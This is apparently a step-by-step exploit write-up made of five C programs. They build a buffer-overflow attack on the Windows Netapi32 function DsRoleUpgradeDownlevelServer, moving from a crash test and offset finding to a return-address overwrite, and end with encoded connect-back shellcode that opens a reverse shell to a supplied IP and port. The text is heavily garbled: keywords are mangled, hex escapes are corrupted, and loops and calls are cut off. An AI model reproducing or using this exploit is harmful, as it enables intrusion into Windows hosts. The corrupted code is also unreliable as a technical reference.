1.include
#include
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long);
DSRoleUpgradeDownLevelServer DSRoleUpGradedownLevelServer;
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
Void main (int Argc, char ** argv) {INT i;
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
BUF [2 * i] = 'a'; DSRoleUpGradedownLvelServer (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], Unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [ 0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0]); return;}
2.
#include
#include
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
Void main (int Argc, char ** argv) {INT i;
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
BUF [2 * I] = (char) (i% 100 100); DSRoleUpgradeDownLevelServer (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) ) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0] (Unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0]); return;}
3.
#include
#include
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
Void main (int Argc, char ** argv) {INT i;
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
BUF [2 * I] = (char) (i / 100 100); DSRoleUpGradedownLevelServer (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) ) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0] (Unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0]); return;}
4.
#include
#include
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
Void main (int Argc, char ** argv) {INT i;
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
BUF [2 * I] = (char) (I / 100 100);
// = 2844 ~ 2847, VALUES 0x7FFA1571 BUF [2 * 2844] = 0x71; BUF [2 * 2845] = 0x15; BUF [2 * 2846] = 0xfa; buf [2 * 2847] = 0x7f;
DsRoleUpgradeDownlevelServer ((unsigned long) & buf [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long ) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0] , (unsigned long) & buf2 [0]); Return;}
5.
#include
#include
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
#define port_offset 118 # define ip_offset 111
Char shellcode [] = "/ x33 / xc9 / x66 / xb9 / x25 / x01 / x80 / x34 / x0b / x99 / x05 / xfa" / XEB / X05 / XE8 / XEB / XFF / XFF / XFF "/ x70 / x99 / xc6 / xfd / x38 / xa9 / x12 / xd9 / x95 / x12" / x12 / x85 / x34 / x12 / xf1 / x91 / x12 / xc0 / x71 / x02 / x99 / x99 / x99 "" / x7b / x60 / xf1 / xaa / xab / x99 / x99 / xf1 / XEE / XEA / XAB / XC6 / XCD / x66 / x8f / x12 "" / x71 / xf3 / x9d / xc0 / x71 / x1b / x7b / x60 / x18 / x75 / x09 / x98 / x99 "" / x99 / xcd / xf1 / x98 / x98 / x99 / x99 / x66 / xcf / x89 / xc9 / xc9 / xc9 "" / xd9 / xc9 / x66 / xcf / x8d / x12 / x41 / xf1 / x9 / x99 / x99 / x98 / XF1 / X9B / X99 / X99 "" / xac / x12 / x55 / xf3 / x89 / xc8 / xca / x66 / xcf / x81 / x1c / x59 / XEC / XD3 / XF1 / XFA "" / XF4 / XFD / X99 / x10 / xf / xa9 / x1a / x75 / xcd / x14 / xa5 / xbd / xf3 / x8c / xc0 / x32 "" / x7b / x64 / x5f / xdd / xbd / x89 / xdd / x67 / xdd / xbd / xa4 / x10 / xc5 / xbd / xd1 / x10 "" / xc5 / xbd / xd5 / x10 / xc5 / XBD / XC9 / X14 / XDD / XBD / X89 / XCD / XC9 / XC8 / XC8 / XC8 "" "" "" "/ XF3 / X98 / XC8 / XC8 / X66 / XEF / XA9 / XC8 / X66 / XCF / X9D / X12 / X55 / XF3 / X66 / X66 "" "/ XA8 / X66 / XCF / X91 / XCA / X66 / XCF / X85 / X66 / XCF / x95 / xc8 / xcf / x12 / xdc / xa5 "" / x12 / xcd / xb1 / xe1 / x9a / x 4C / XCB / X12 / XEB / XB9 / X9A / X6C / XAA / X50 / XD0 / XD8 "" "" / x34 / x9a / x5c / xaa / x42 / x96 / x27 / x89 / xa3 / x4f / xed / x91 / x58 / X52 / x94 / x9a "" / x43 / xd9 / x72 / x68 / xa2 / x86 / x12 / xc3 / xbd / x9a / x44 / xd2 / x12 "" / x95 / xd2 / x12 / xc3 / X85 / X9A / X44 / X12 / X9D / X12 / XC7 / XC0 / X5A "" / x71 / x99 / x66 / x66 / x66 / x17 / xd7 / x97 / x75 / Xeb / x67 / x2a / X8F / X34 / X40 / X9C "" / x57 / x52 / x74 / x65 / x5 / x40 / x90 / x6c / x33 "/ xf9 / x7e / xe0 / X5F / XE0 "; void mshell (char * h, char * p) {unsigned short port; unsigned long ip;
Port = HTONS (ATOI (P)) ^ (Ushort) 0x9999; IP = INET_ADDR (H) ^ (Ulong) 0x99999999; Memcpy (& shellcode [Port_Offset], & Port, 2); Memcpy (& shellcode [ip_offset], & ip, 4) } void main (int Argc, char ** argv) {INT i;
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
BUF [2 * I] = (char) (I / 100 100);
// = 2844 ~ 2847, VALUES 0x7FFA1571 BUF [2 * 2844] = 0x71; BUF [2 * 2845] = 0x15; BUF [2 * 2846] = 0xfa; buf [2 * 2847] = 0x7f;
// i = 2840 ~ 2843, NOP / NOP / JMP 4, VALUES 90 90 EB 04 BUF [2 * 2840] = 0x90; BUF [2 * 2841] = 0x90; BUF [2 * 2842] = 0XEB; BUF [2 * 2843] = 0x04;
Mshell ("127.0.0.1", "1111"); // Shellcode Connect Back to Port 1111
For (i = 0; I DsRoleUpgradeDownlevelServer ((unsigned long) & buf [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long ) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0] , (unsigned long) & buf2 [0]); Return;}